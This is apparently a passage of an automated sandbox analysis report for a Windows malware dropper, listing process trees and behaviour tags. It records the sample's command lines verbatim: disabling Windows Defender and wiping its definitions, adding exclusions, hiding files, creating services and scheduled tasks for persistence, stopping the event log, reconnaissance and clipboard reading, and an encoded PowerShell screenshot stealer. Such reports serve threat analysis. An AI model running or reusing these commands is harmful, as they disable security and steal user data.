PID 2360 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 3372 wrote to memory of 2564 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3372 wrote to memory of 2564 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3372 wrote to memory of 2564 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2564 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe
PID 2564 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe
PID 2360 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 4180 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4180 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3852 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2360 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3776 wrote to memory of 2940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3776 wrote to memory of 2940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2360 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe

"C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\fK1YYsKuG.vbe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "XLZQHCLS"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XLZQHCLS"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"

C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe

C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ ​ .scr'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\TPw4JEK.bat" "

C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe

"C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ ​ .scr'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /f

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /f

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Recovery\WindowsRE\wininit.exe

"C:\Recovery\WindowsRE\wininit.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

